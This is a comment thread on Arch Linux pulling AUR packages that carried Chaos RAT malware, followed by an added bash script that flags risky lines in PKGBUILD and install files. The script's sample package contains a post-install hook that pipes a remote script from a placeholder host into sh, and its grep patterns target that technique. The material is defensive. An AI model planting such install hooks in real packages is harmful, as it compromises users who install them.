Arch Linux pulls AUR packages that installed Chaos RAT malware

https://www.bleepingcomputer.com/news/security/arch-linux-pulls-aur-packages-that-installed-chaos-rat-malware/
10•mikece•6mo ago

Comments

lr0•6mo ago
I remember when I was using Arch around 5 years ago and I was looking for the Brave browser package, when I found it could only be installed through the AUR, for some reason I had the assumption that since it's hosted on Arch's official servers it must be properly reviewed even if it was built by the community (like how Chrome web extensions are, for example). And I installed so many AUR packages for things that I used to manually install or find a workaround to install their .deb file on my Arch (using dpkg[0] for example). Then, I was in IRC and I found two fellows talking about "trusting" the AUR, and you can imagine the rest. I started an AUR-detox.

Before moving totally from Arch I kept some AUR packages that I could not let go of, but on the condition of checking their scripts thoroughly and making sure to check them even more thoroughly with each update, and only updating them when it's really necessary. I'm not sure if other Linux package repositories (like Nix) have these supply-chain-attack possibilities or if they employ a better review mechanism, but I really hope if Arch maintainers can find a solution to make the AUR safer, at least more than how it currently sounds.

[0]: https://tracker.debian.org/pkg/dpkg

jolmg•6mo ago
This is also why AUR helpers are unofficial and the packages don't come prebuilt. The official way to use the AUR is very manual, precisely to encourage reviewing. You have to download the PKGBUILD and accompanying files manually (git clone, etc.), review the files, then `makepkg`, then `pacman -U`. It's in the wiki article for the AUR:

https://wiki.archlinux.org/title/Arch_User_Repository

It even says:

> 2. Verify that the PKGBUILD and accompanying files are not malicious or untrustworthy.

> but I really hope if Arch maintainers can find a solution to make the AUR safer

Safe packages go on the official repos. The entire point of the AUR is to be a low-friction repo for Arch users to share their packages. A "safe" AUR is to have no AUR and just have the official repos.
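
A first-pass aid for the "review the files" step described in the comment above, as an added example that is not part of the thread or of any Arch tooling. The function names `audit_aur_dir` and `make_sample`, the sample package and the `example.invalid` URLs are all constructed for illustration; the script only flags lines to read first and does not replace reading the PKGBUILD and `.install` files in full.

```shell
#!/usr/bin/env bash
# Heuristic triage of an AUR checkout before running makepkg.
# It points a reviewer at lines to read first; it does not prove a package safe.

# audit_aur_dir DIR -> prints "TAG file:line:text" for each finding.
audit_aur_dir() {
    local dir="$1" f name
    for f in "$dir"/PKGBUILD "$dir"/*.install; do
        [ -f "$f" ] || continue
        name=${f##*/}
        scan() { grep -nE -- "$2" "$f" | sed "s|^|$1 $name:|"; }
        # Downloaded content handed straight to a shell.
        scan PIPE-TO-SHELL '(curl|wget)[^#]*\|[[:space:]]*(sudo[[:space:]]+)?(ba|z)?sh'
        # Fetches made by the script itself, outside the declared source=() array.
        scan RUNTIME-FETCH '(^|[^[:alnum:]_])(curl|wget|git[[:space:]]+clone)[[:space:]]'
        scan OBFUSCATION   '(^|[^[:alnum:]_])(eval|base64[[:space:]]+(-d|--decode))'
        # A source whose integrity check is disabled.
        scan NO-CHECKSUM   "(^|[^[:alnum:]_])SKIP([^[:alnum:]_]|\$)"
        # Install scriptlets run as root when pacman installs the package.
        scan INSTALL-HOOK  '^[[:space:]]*install='
    done
    return 0
}

# Constructed sample checkout (not a real package); prints its directory.
make_sample() {
    local d; d=$(mktemp -d)
    cat > "$d/PKGBUILD" <<'EOF'
pkgname=example-tool
pkgver=1.0
pkgrel=1
arch=('x86_64')
source=("https://example.invalid/example-$pkgver.tar.gz"
        "patches::git+https://example.invalid/patches.git")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000'
            'SKIP')
install=example.install
package() {
    install -Dm755 example "$pkgdir/usr/bin/example"
}
EOF
    cat > "$d/example.install" <<'EOF'
post_install() {
    curl -fsSL https://example.invalid/setup.sh | sh
}
EOF
    printf '%s\n' "$d"
}

sample_dir=$(make_sample); audit_aur_dir "$sample_dir"; rm -rf "$sample_dir"
```

On a real checkout, run `audit_aur_dir .` inside the cloned directory before `makepkg`, and re-run it on every update, since a package that was clean at first install can change later.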